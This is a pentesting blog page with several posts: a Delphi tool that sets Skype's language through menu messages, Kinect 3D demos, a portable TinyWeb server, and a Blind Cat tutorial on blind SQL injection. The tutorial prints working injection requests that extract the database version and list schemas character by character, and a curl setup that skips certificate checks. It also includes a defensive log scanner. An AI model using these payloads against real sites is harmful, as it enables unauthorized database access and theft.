IT Security Lab The Playground for IT Security Specialists and Pentesters

3 Jan/11

Changed language does not persist when Skype is restarted: how to solve the annoying issue

You know, I like intelligent and handy software. I really do. But I hate with all my heart when an application (or the application's author?) is eee... "too smart". ;-) And what especially makes me nervous is when the author calls some idiotic behavior of the application "a feature". I think Skype is a nice example of this. Look at this:

I have the default system language in Windows set to English, but the default language for non-Unicode programs is set to Polish. Nothing wrong with that, right? So when I start Skype for the first time it happily detects this setting and switches its language to Polish accordingly. Chaaarming. ;-)

Now let's imagine that I want to change Skype's default language permanently to English (well, I much prefer an English UI in all apps, ok). Life seems easy: click the main menu, then Tools --> Change language --> English ... and the language is changed. Now try to close Skype and open it again... What do you see? The application's language is immediately switched back to Polish! Ok, you may try to attack the problem from a different side: Tools --> Options --> Tab: General settings --> Languages combo: English, then Save. Unfortunately the effect is exactly the same: when Skype is restarted it switches the language to the one set as the default for non-Unicode programs (in my case: Polish). God knows why this proggy has such an amazing feature, but believe me, changing the language manually after each restart becomes pretty annoying after some time.

As usual, I googled the problem and quickly found out that I am not alone: look here for example http://portableapps.com/node/21644. So can we do anything? Yes we can®! :-)

I wrote a small program which runs Skype and then simulates mouse clicks on the main menu, and so kind of "pseudo-manually" switches the application's language to the default one (English). This is also a nice small example of how you may access the main menu of application "B" from the code of application "A" and execute some functionality in application "B". No worries, we are not "literally" moving the mouse cursor to the menu, but issuing the appropriate system messages, so everything is pretty elegant.

Ok, if someone needs only the executables, here they are (with the source code in Delphi):

Usage is very simple: extract the executable, put it in the same folder where your SkypePortable.exe or Skype.exe is located, and run it. My little program runs Skype, waits until it is loaded and switches the language to English. Job done! :-)

Some technical background

Ok, so this is how it works. First of all we have to find the Skype window in the system (make sure it exists, so we may get its handle and access its child elements). This is rather trivial, so no need to explain anything. Once the window is found, this is what we are doing:

//--- Timer handler of the helper application. The form and handler names are
//--- assumed here: the original listing starts at the var section.
procedure TfrmMain.tmrMainTimer(Sender: TObject);
var
  h: HWND;                    //--- handle of Skype's main window
  menu: HMenu;
  id: integer;
  s: Array[0..255] of char;
begin
  tmrMain.Enabled := false;

  h := findWindow(pchar('tSkMainForm.UnicodeClass'), nil);  //--- find Skype's window
  if h = 0 then
  begin
    tmrMain.Enabled := true;  //--- Skype not loaded yet: try again on the next tick
    Exit;
  end;

  menu := getMenu(h); //--- find the main menu
  FillChar(s, SizeOf(s), 0); //--- make sure s is empty if GetMenuString fails
  GetMenuString(menu, 5, @s[0], 255, MF_BYPOSITION); //--- get the text of 6th menu item (should be '&Help')

  if string(s) <> '&Help' then  //--- current language is NOT English
  begin
    menu := getMenu(h); //--- main menu
    menu := GetSubMenu(menu, 4); //--- find the 5th menu item

    //--- activate this (5th) menu item, so all subitems can be redrawn. This is IMPORTANT!
    SendMessage(h, WM_INITMENU, WPARAM(menu), 0);
    SendMessage(h, WM_INITMENUPOPUP, WPARAM(menu), 0);

    menu := GetSubMenu(menu, 2); //--- find the 3rd submenu item

    id := GetMenuItemID(menu, 9); //--- 10th menu item (select "English")
    PostMessage(h, WM_COMMAND, id, 0); //--- click it! :-)
  end;

  SendMessage(h, WM_SYSCOMMAND, SC_MINIMIZE, 0);
  application.Terminate;
end;

So the 1st thing we have to do is check which language is currently set. We get the text of the 6th menu item and check whether it is equal to "&Help" or not. Currently it's "&Pomoc", which means the current language is not English (yea, it's Polish actually).

This is the code used for checking:

  h := findWindow(pchar('tSkMainForm.UnicodeClass'), nil);  //--- find Skype's window
  menu := getMenu(h); //--- find the main menu
  GetMenuString(menu, 5, @s[0], 255, MF_BYPOSITION); //--- get the text of 6th menu item (should be '&Help')

  if string(s) <> '&Help' then  //--- current language is NOT English
  begin
  [...]
  end;

Now we have to walk through the menus and sub-menus and run an action on the target item. Look at this code:

    menu := getMenu(h); //--- main menu
    menu := GetSubMenu(menu, 4); //--- find the 5th menu item

    //--- activate this (5th) menu item, so all subitems can be redrawn. This is IMPORTANT!
    SendMessage(h, WM_INITMENU, WPARAM(menu), 0);
    SendMessage(h, WM_INITMENUPOPUP, WPARAM(menu),0);

    menu := GetSubMenu(menu, 2); //--- find the 3rd submenu item

    id := GetMenuItemID(menu, 9); //--- 10th menu item (select "English")
    PostMessage(h, WM_COMMAND, id, 0); //--- click it! :-)

Important detail: the two SendMessage calls (WM_INITMENU and WM_INITMENUPOPUP) are an essential part of the code, because the sub-menu with the list of languages is generated "on the fly" once the parent menu item is activated. Without them the 10th menu item (language "English") simply does not exist, hence can't be called.

One more remark: the proposed solution requires the Skype user interface (the window's Visual Style) to run in "Classic Windows" mode.
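The menu positions above (5th item, 3rd sub-item, 10th language) were found by hand. As an added diagnostic example, not code from the original post, here is a Delphi routine that dumps a window's whole menu tree with positions and command IDs. It sends WM_INITMENUPOPUP to the owning window before descending into each popup, which is exactly the step that makes the on-the-fly language list visible: run it without that message and the language submenu comes out empty. The class name 'tSkMainForm.UnicodeClass' is taken from the post; the Memo1 control in the usage comment is an assumption.

```delphi
uses
  Windows, Classes, SysUtils;

// Appends every item of Menu, and recursively of its submenus, to Lines as
// "[position] caption (id=...)", indented by Depth. Before descending into a
// popup it sends WM_INITMENUPOPUP to the owning window, because some
// applications (Skype's language list among them) fill a submenu only when
// it is about to be displayed; without that message the popup reads as empty.
procedure DumpMenu(Wnd: HWND; Menu: HMENU; Depth: Integer; Lines: TStrings);
var
  i: Integer;
  Buf: array[0..255] of Char;
  Caption, Indent: string;
  Sub: HMENU;
begin
  Indent := StringOfChar(' ', Depth * 2);
  for i := 0 to GetMenuItemCount(Menu) - 1 do
  begin
    FillChar(Buf, SizeOf(Buf), 0);
    GetMenuString(Menu, i, @Buf[0], Length(Buf) - 1, MF_BYPOSITION);
    Caption := string(Buf);
    if Caption = '' then
      Caption := '----------';  // separators have no text
    Sub := GetSubMenu(Menu, i);
    if Sub <> 0 then
    begin
      Lines.Add(Format('%s[%d] %s', [Indent, i, Caption]));
      // Low word of lParam is the popup's position within its parent menu.
      SendMessage(Wnd, WM_INITMENUPOPUP, WPARAM(Sub), MakeLParam(i, 0));
      DumpMenu(Wnd, Sub, Depth + 1, Lines);
    end
    else
      Lines.Add(Format('%s[%d] %s  (id=%d)',
        [Indent, i, Caption, Integer(GetMenuItemID(Menu, i))]));
  end;
end;

// Finds the top-level window of the given class and dumps its main menu.
// Returns False when the window does not exist or has no menu bar.
function DumpWindowMenu(const WindowClass: string; Lines: TStrings): Boolean;
var
  Wnd: HWND;
  Menu: HMENU;
begin
  Result := False;
  Wnd := FindWindow(PChar(WindowClass), nil);
  if Wnd = 0 then
    Exit;
  Menu := GetMenu(Wnd);
  if Menu = 0 then
    Exit;
  // Same preparation the fix itself relies on: let the window initialise
  // the menu bar before its popups are inspected.
  SendMessage(Wnd, WM_INITMENU, WPARAM(Menu), 0);
  DumpMenu(Wnd, Menu, 0, Lines);
  Result := True;
end;

// Usage, e.g. from a button handler (Memo1 is an assumed TMemo on the form):
//   if not DumpWindowMenu('tSkMainForm.UnicodeClass', Memo1.Lines) then
//     Memo1.Lines.Add('Skype main window not found');
```

The dump shows, for each top-level item, the captions of its popup in the current UI language and the WM_COMMAND id of every leaf, so the position-based indices in the fix can be checked against the actual menu rather than counted by eye.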

29 Dec/10

More 3D Fun with Kinect and Delphi. You can grab and save still 3D frames!

Foreword: I am still in a Christmas mood. ;-) And considering the really huge interest in such a "sparkling marriage" (Delphi and Kinect) and the very positive feedback from you guys, I made some quick changes to the 3D demo (which you should already know well) and added even more cool features. This is what was done:

  • Most important thing: now you can grab 3D frames (3D data + 2D mapping), save them and open them on a computer without a Kinect! No need to have any drivers installed. You can give this program to your friends and they will be able to see your 3D pictures! :-)
  • 2D to 3D mapping is fixed. It's still not ideal, but much better than before.
  • You can switch the 2D and 3D viewing modes on/off. Pretty handy.
  • It is possible to control the motor and change the tilt of the Kinect.
  • The newest version of Kinect.pas is included (Simon J Stuart - thank you for the update! More info about the TKinect project is here)
  • Bugs fixed here and there.

The EXE is precompiled as usual, so it can be used right away. Here is the link to the EXE and the source code in Delphi:

http://itsecuritylab.eu/files/kinect/kinect_delphi_3dpoints.zip

To make yourself more familiar with what the story is about, I strongly encourage you to look through the previous post about the Kinect and watch the movie.

How to save/load a 3D frame

It's pretty easy actually. Select Frame --> Save from the main menu (you didn't expect anything else, yea?), then give a name without a file extension. The program will grab the current frame and create 2 BMP files: one for the 2D and the other for the 3D data (yes, they are just regular BMP files).

Those files will carry a special suffix. The keywords: _KinectRGB and _KinectDepth.

If you want to open a frame: go to Frame --> Load and point to either of those two files. The program will find its way to load them properly :-)

3D view on/off

There is nothing to explain here really.

Some sample images are included in the package (e.g. a nice 3D view of my corridor) :-)

This is it. Have fun and definitely drink enough to celebrate the New Year properly!

27 Dec/10

Having Fun with Kinect and Delphi (examples of 2D and 3D visualization)

Well well well... All signs in the Sky and on the Earth clearly say: it's Christmas time! So it's time to have some rest and fun, and definitely nothing can be better than spending some time with family and a new toy. ;-) Actually it's my son who got the XBox with the Kinect, but well... let parents have some fun too, right?

It's not like I am trying to reinvent the wheel (there are plenty of applications using Kinect on a PC), but so far I have not found any nice examples of how this incredibly cool thing can be used with Delphi. And you don't think I can leave it "just like that", do you? ;-) So see the results below (video) and some more technical details of both applications (2D and 3D visualization). So for today there will be no hacking, boys and girls, just pure awesome 3D-virtual-reality joy... :-)

Ok, so you want to get those samples, probably tweak them, and run your own code? Nothing could be simpler:

Prerequisites:

Everything installs like a charm. Some subtle obstacles with GLScene, but nothing complicated enough to be worth mentioning really. Important: before you run anything, be sure that the Kinect device is recognized by your computer (check it in your Device Management panel).

Ach, I almost forgot: take the source files of my applications from here:

Running all that stuff

Now you can try to compile and test both applications. You have already seen in the movie how those applications can be used. Pre-compiled exe files are included in the ZIP packages, just for your convenience. So in the end this is what we have:

2D data visualization

The experiment shows how to collect, process and draw the Kinect's data on the screen. Rather typical, you've seen it before for sure. An additional challenge was to write a function able to "track blobs": areas on the screen with similar pixels. This is needed to track your hands, fingers, nose or whatever you want to use. It is far, far from ideal, but surprisingly it works!

One more remark: the DOF function, which selects pixels in a certain 3D range, is part of the application, not of the Kinect hardware.

I also hope you will forgive me such an eeee... "untypical" way of getting depth data from a pixel's color by this innocent transformation: RGB -> HLS -> [custom function] -> range [0..255]

3D data visualization

You can see my room (and actually yours too) in 3D on a wobbling 3D virtual screen made of tiny colorful dots :-) Do you like my Xmas tree?

So you see, Delphi is such a nice and (important!) easy language (appropriate for lazy coders) that even writing pretty complex applications can take you just a couple of hours. I also hope that now even more people will start playing with Kinect and do some cool things, [so more happiness will come on Earth this Christmas, etc, etc.]. Remember: You are the controller®. Amen. :-)

Special thanks to Simon J Stuart for his TKinect Delphi component
and to Jet Noir (http://soundcloud.com/jet-noir) for her music for the video!

This is it. Let me know if you like those crazy apps, and well... Have a nice Christmas and a happy New Year! :-)

24 Sep/10

TinyWeb: Pocket-size Portable Web Server With CGI And PHP Support (!)

You know, each of us has some tools we really like to use. Tools which are not "just good". We simply love them. They are nice-looking, reliable, and (this is especially important) simple and easy to use. One of such little toys I use quite often in exploitation practice (and obviously in many other weird experiments) is the freeware TinyWeb web server created by Maxim Masiutin from RitLabs. The server is extremely small (actually it's a single file only, about 60 Kb). Despite that, this little creature serves HTML, executes CGI, supports SSL, writes logs, etc., etc. The full list of features you may find [here].

It's a really nice tool, and recently I had an opportunity to improve the TinyWeb server a little bit, so I want to share it with you. Obviously this is still not such a full-featured server as Wamp, but it is tiny, handy and can be a significant part of your "pocket hacking toolset". How to use it for your own benefit I would leave to you. :-)

So what functionality did I add?

  • TinyWeb supports PHP (Yeeeeaa!). (Can you imagine a web server without PHP? I can't.) Surprisingly, the original version of the server had some difficulties running PHP. Now the source code is slightly changed, so everything works smoothly. Note: PHP runs as CGI.
  • The server is 100% portable now! No need for installation or configuration: just copy it to any folder, make a single click and voila! everything is configured and running immediately (yes, PHP is also configured automatically).
  • PHP files may be placed in any folder inside \wwwroot (note that in the original TinyWeb server CGI is handled only in the \wwwroot\cgi-bin folder).

Looks good? Och, believe me, it is. Let's see what this little beast can do for us, but "first things first": see what you may download:

Download binaries:

Download source code:

Note that the author (Maxim Masiutin) kindly published the source code of the standard TinyWeb server only (without SSL support), so this is the only version modified by me for now (hence the only one that supports PHP).

Running the little daemon

Ok, in our first example we will be using the version of the server with PHP support. Download it and unzip it to any folder on your PC (you already did it, yea?). Now run the file "run_web_server.exe". Important: you must run it as Administrator. The same application may be used for both versions of TinyWeb: with and without SSL support. Once you have it running, everything should be self-explanatory (not much to configure really):

If you are using the TinyWeb version with SSL, you will see the following info at the bottom:

Once we have the port chosen, press the [RUN] button. Note that the LPORT field is grayed out now and the [RUN] button is also disabled. Our server is running!

Now you can close this application completely; the TinyWeb server will keep happily running in the background. How to stop the server? Oh I don't know, try to guess... ;-)

Is it really working?

Ok, the server is running, now let's browse the structure of our folders:

wwwroot
|   index.htm
|   index.php
|   login.htm
|
+---cgi-bin
        login.exe
        shell.php
        test.cmd
        test.php
        test.pl

Those files will be available "on-line" under the following URLs:

http://localhost:81/index.htm

http://localhost:81/index.php

http://localhost:81/login.htm

http://localhost:81/cgi-bin/shell.php

http://localhost:81/cgi-bin/test.cmd

http://localhost:81/cgi-bin/test.php

http://localhost:81/cgi-bin/test.pl <-- to run this you must have Perl installed

Try to open them in your browser and see what happens. :-) Actually any console program with stdIN and stdOUT can be easily handled by the TinyWeb server (which is really handy).

Imagine that you have the following batch file:

When you navigate to the URL http://localhost:81/cgi-bin/test.cmd you will see in your browser something like this:

Nice, isn't it! :-)

Remember one important thing: PHP is supported in \wwwroot (and in any nested subfolder inside it). CGI is handled only in the \wwwroot\cgi-bin folder and its subfolders.
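To show the stdIN/stdOUT contract the server relies on, here is an added Delphi console CGI program. It is my example, not one of the files shipped with the post or with TinyWeb: it reads the request details from the standard CGI environment variables (REQUEST_METHOD, QUERY_STRING, REMOTE_ADDR, CONTENT_LENGTH), reads a POST body from stdin, and writes headers plus an HTML page to stdout. Everything it echoes is HTML-escaped first, so whatever arrives in the request is shown as text rather than rendered as markup. Compile it and drop the EXE into \wwwroot\cgi-bin next to login.exe.

```delphi
program CgiEcho;
{$APPTYPE CONSOLE}

uses
  Windows, SysUtils;

// Escapes the characters that would otherwise let echoed request data be
// interpreted as HTML by the browser.
function HtmlEscape(const S: string): string;
begin
  Result := StringReplace(S, '&', '&amp;', [rfReplaceAll]);
  Result := StringReplace(Result, '<', '&lt;', [rfReplaceAll]);
  Result := StringReplace(Result, '>', '&gt;', [rfReplaceAll]);
  Result := StringReplace(Result, '"', '&quot;', [rfReplaceAll]);
end;

// Reads the request body from standard input. CGI announces its size in
// CONTENT_LENGTH; never read more than that, the server may keep the pipe open.
function ReadBody: AnsiString;
var
  Declared: Integer;
  Len, Total, Got: DWORD;
begin
  Result := '';
  Declared := StrToIntDef(SysUtils.GetEnvironmentVariable('CONTENT_LENGTH'), 0);
  if Declared <= 0 then
    Exit;
  Len := Declared;
  SetLength(Result, Len);
  Total := 0;
  while Total < Len do
  begin
    if not ReadFile(GetStdHandle(STD_INPUT_HANDLE), Result[Total + 1],
                    Len - Total, Got, nil) or (Got = 0) then
      Break;  // pipe closed early: keep what we have
    Inc(Total, Got);
  end;
  SetLength(Result, Total);
end;

var
  Method: string;
begin
  Method := SysUtils.GetEnvironmentVariable('REQUEST_METHOD');
  // CGI contract: response headers, one empty line, then the body. The server
  // wraps this into a complete HTTP response.
  Writeln('Content-Type: text/html; charset=utf-8');
  Writeln;
  Writeln('<html><body>');
  Writeln('<p>Method: ', HtmlEscape(Method), '</p>');
  Writeln('<p>Query string: ',
    HtmlEscape(SysUtils.GetEnvironmentVariable('QUERY_STRING')), '</p>');
  Writeln('<p>Remote address: ',
    HtmlEscape(SysUtils.GetEnvironmentVariable('REMOTE_ADDR')), '</p>');
  if Method = 'POST' then
    Writeln('<p>Body: ', HtmlEscape(string(ReadBody)), '</p>');
  Writeln('</body></html>');
end.
```

With the server running on port 81 as in the post, http://localhost:81/cgi-bin/CgiEcho.exe?a=1&b=2 shows the decoded method and query string; a form posting to the same URL shows the body as well. The point of the escaping is that a CGI program is a full HTTP endpoint: anything it writes without encoding ends up in the page exactly as the client sent it.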

A couple of words about TinyWeb with SSL support

This is the original version of the TinyWeb binary with SSL support, compiled by Maxim Masiutin. The source code unfortunately is not available, so I cannot make the necessary modifications, hence PHP is not supported. Sad but true.

Anyway, you may download it from here along with sample SSL certificates (and of course with run_web_server.exe), in fully portable form. So again, nothing to configure. Just unzip and run!

14 Sep/10

Blind Cat is Updated to 0.0.1.1. No More Problems With SSL Certificates!

Ok, it seems the Blind Cat tool was found to be pretty useful, so thanks to all of you for downloading and testing! :-) If you don't know what it is, you are welcome to read the previous article [here]. Recently I made some updates to the tool, as during the last tests there were some issues when connecting to the target website over SSL. I think this is a good occasion to fix the thing (already done!) and explain one more time how everything works. You will see how easy it is to exploit SQL injections with Blind Cat (if you know what you are doing...).

So how to use this blind... thing? ;-) A quick tutorial.

Before going further, download the new version 0.0.1.1 beta binary from [here]. Good. Now let's go through the test case step by step.

Step 1: Confirming SQL injection

So I am using Burp Suite and checking for SQL injection in some well-known website. This is the HTTP header I am sending when testing the "true" condition:

GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=1--%20&rand=2975386456123 HTTP/1.1
Host: vulnerable.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://vulnerable.com/shop/login.php
Cookie: PHPSESSID=8547113e62bf285f7f72e9688d098a54

...which gives me this:

Now I am changing the header and testing the "false" condition:

GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=2--%20&rand=2975386456123 HTTP/1.1
Host: vulnerable.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://vulnerable.com/shop/login.php
Cookie: PHPSESSID=8547113e62bf285f7f72e9688d098a54

...and the result is:

Very clean and nice example, right? To be sure we are really dealing with SQL injection (and not some strange response from the web server) it makes sense to play some simple maths and send the following query (a fragment of the header is below):

GET /shop/index.php?exec=serv&type=1&mid=15205%20or%205=(3+2)--%20&rand=2975386456123 HTTP/1.1
Host: vulnerable.com
...

Once the vulnerability is confirmed we may go forward and configure our CURL parameters. Note that I am sending a GET request over HTTPS (it's important in our case).

Step 2. Configuring CURL

We should open the curl.config file in our main Blind Cat folder and modify it the following way (pay attention to the custom header entries and the target URL):

#-------------------------------------- custom header
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
-H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"
-H "Accept-Language: en-gb,en;q=0.5"
-H "Keep-Alive: 300"
-H "Content-Type: application/x-www-form-urlencoded"
-H "Referer: https://vulnerable.com/shop/login.php"
-H "Cookie: PHPSESSID=8547113e62bf285f7f72e9688d098a54"

#-------------------------------------- target URL
url https://vulnerable.com/shop/index.php?exec=serv&type=1&mid=15205%20or%201=1--%20&rand=2975386456123

#-------------------------------------- use proxy or not
#-x localhost:8080

#-------------------------------------- do we need a header to preview?
#--dump-header incoming_header.txt

Now we may run the batch file test_curl_settings.cmd, which executes CURL with those parameters and stores the result in the file incoming_html.htm. We have 1=1 in our request, remember? Let's check the output file (there should be some content in it), then change the parameter to 1=2 and check the output file again (now it should be empty). If everything is working properly, we are ready to extract the data from the back-end database!

The previous version of Blind Cat was not handling crappy certificates properly, so as a result you might have gotten the following error:

So what I did: I let CURL completely ignore certificate checking. SSL is still used, but the certificate isn't verified anymore. The appropriate tiny change was made in the test_curl_settings.cmd file and in Blind Cat's source code. FYI: curl.exe should now be called the following way:

curl --config curl.config -k

Simple. :-)

Step 3. Let's suck some data

Now we may try to extract some real data from the back-end system. To begin with, a classic: getting the SQL engine version number. Note: in this case we are dealing with MySQL. The SQL query to be executed:

SELECT @@version

...which in our case transforms into something like this:

GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=(SELECT%20((SELECT%20ASCII(SUBSTRING(@@VERSION,<char_position>,1)))><char_value>))--%20&rand=2975386456123 HTTP/1.1
Host: vulnerable.com
....

Note that > is a "greater than" sign. Now let's try to list all databases. SQL query:

SELECT schema_name FROM information_schema.schemata

...magically transforms into:

GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=(SELECT%20((SELECT%20ASCII(SUBSTRING((SELECT%20schema_name%20FROM%20information_schema.schemata%20LIMIT%20<main_iterator>,1),<char_position>,1)))><char_value>))--%20&rand=2975386456123 HTTP/1.1
Host: vulnerable.com
....

The only difference in this case is that we will be reading the multi-line output line by line, hence the added LIMIT <x>, 1. Just in case, let me remind you one more time where those values are taken from:
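Seen from the other side of the wire, the requests above have a very recognisable shape: the same URL repeated hundreds of times with only <char_position> and <char_value> changing, and SQL fragments such as ASCII(SUBSTRING( or information_schema in the query string. As an added example, not part of Blind Cat or of the original post, here is a small Delphi console program that URL-decodes web server log lines and flags the ones carrying those fragments. The log lines are constructed for the example and mirror the request shapes shown above; they are not real traffic.

```delphi
program BlindSqliLogScan;
{$APPTYPE CONSOLE}

uses
  SysUtils;

// Decodes %XX sequences and '+' so that SQL hidden in a URL can be
// inspected as plain text. Malformed %XX becomes '?'.
function UrlDecode(const S: string): string;
var
  i: Integer;
begin
  Result := '';
  i := 1;
  while i <= Length(S) do
  begin
    if (S[i] = '%') and (i + 2 <= Length(S)) then
    begin
      Result := Result + Chr(StrToIntDef('$' + Copy(S, i + 1, 2), Ord('?')));
      Inc(i, 3);
    end
    else
    begin
      if S[i] = '+' then
        Result := Result + ' '
      else
        Result := Result + S[i];
      Inc(i);
    end;
  end;
end;

// Lower-cases the decoded request and strips all whitespace, so that
// "ASCII( SUBSTRING(" and "ascii(substring(" compare equal.
function Normalise(const S: string): string;
var
  i: Integer;
begin
  Result := '';
  for i := 1 to Length(S) do
    if S[i] > ' ' then
      Result := Result + LowerCase(S[i]);
end;

const
  // Fragments that appear in the boolean-based extraction requests shown
  // in the post; each one alone is rare in legitimate shop traffic.
  Markers: array[0..3] of string = (
    'ascii(substring(',     // one character of the result at a time
    'or1=(select',          // a subquery used as a true/false condition
    'information_schema.',  // schema enumeration
    '@@version');           // engine fingerprinting

// Returns the first marker found in the request line, or '' if none matches.
function BlindSqliMarker(const RequestLine: string): string;
var
  Norm: string;
  k: Integer;
begin
  Result := '';
  Norm := Normalise(UrlDecode(RequestLine));
  for k := Low(Markers) to High(Markers) do
    if Pos(Markers[k], Norm) > 0 then
    begin
      Result := Markers[k];
      Exit;
    end;
end;

const
  // Constructed access-log lines (not real traffic): two in the shape of the
  // post's extraction requests, two ordinary ones.
  SampleLog: array[0..3] of string = (
    '10.0.0.5 - - "GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=(SELECT%20((SELECT%20ASCII(SUBSTRING(@@VERSION,1,1)))>64))--%20 HTTP/1.1" 200',
    '10.0.0.5 - - "GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=(SELECT%20((SELECT%20ASCII(SUBSTRING((SELECT%20schema_name%20FROM%20information_schema.schemata%20LIMIT%200,1),1,1)))>96))--%20 HTTP/1.1" 200',
    '10.0.0.7 - - "GET /shop/index.php?exec=serv&type=1&mid=15205 HTTP/1.1" 200',
    '10.0.0.8 - - "GET /shop/login.php HTTP/1.1" 200');

var
  i: Integer;
  Marker: string;
begin
  for i := Low(SampleLog) to High(SampleLog) do
  begin
    Marker := BlindSqliMarker(SampleLog[i]);
    if Marker <> '' then
      Writeln('SUSPECT (', Marker, '): ', SampleLog[i]);
  end;
end.
```

On the sample above the first two lines are reported and the last two are not. In a real log the stronger signal is volume rather than any single line: extracting one character this way costs several requests, so a whole version string or database list leaves a long run of near-identical requests from one client, and the parameter that varies between them is the one being tested.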

All right, this is it. Don't forget to get the new [binaries] and the [source code]. So happy hacking pentesting! :-)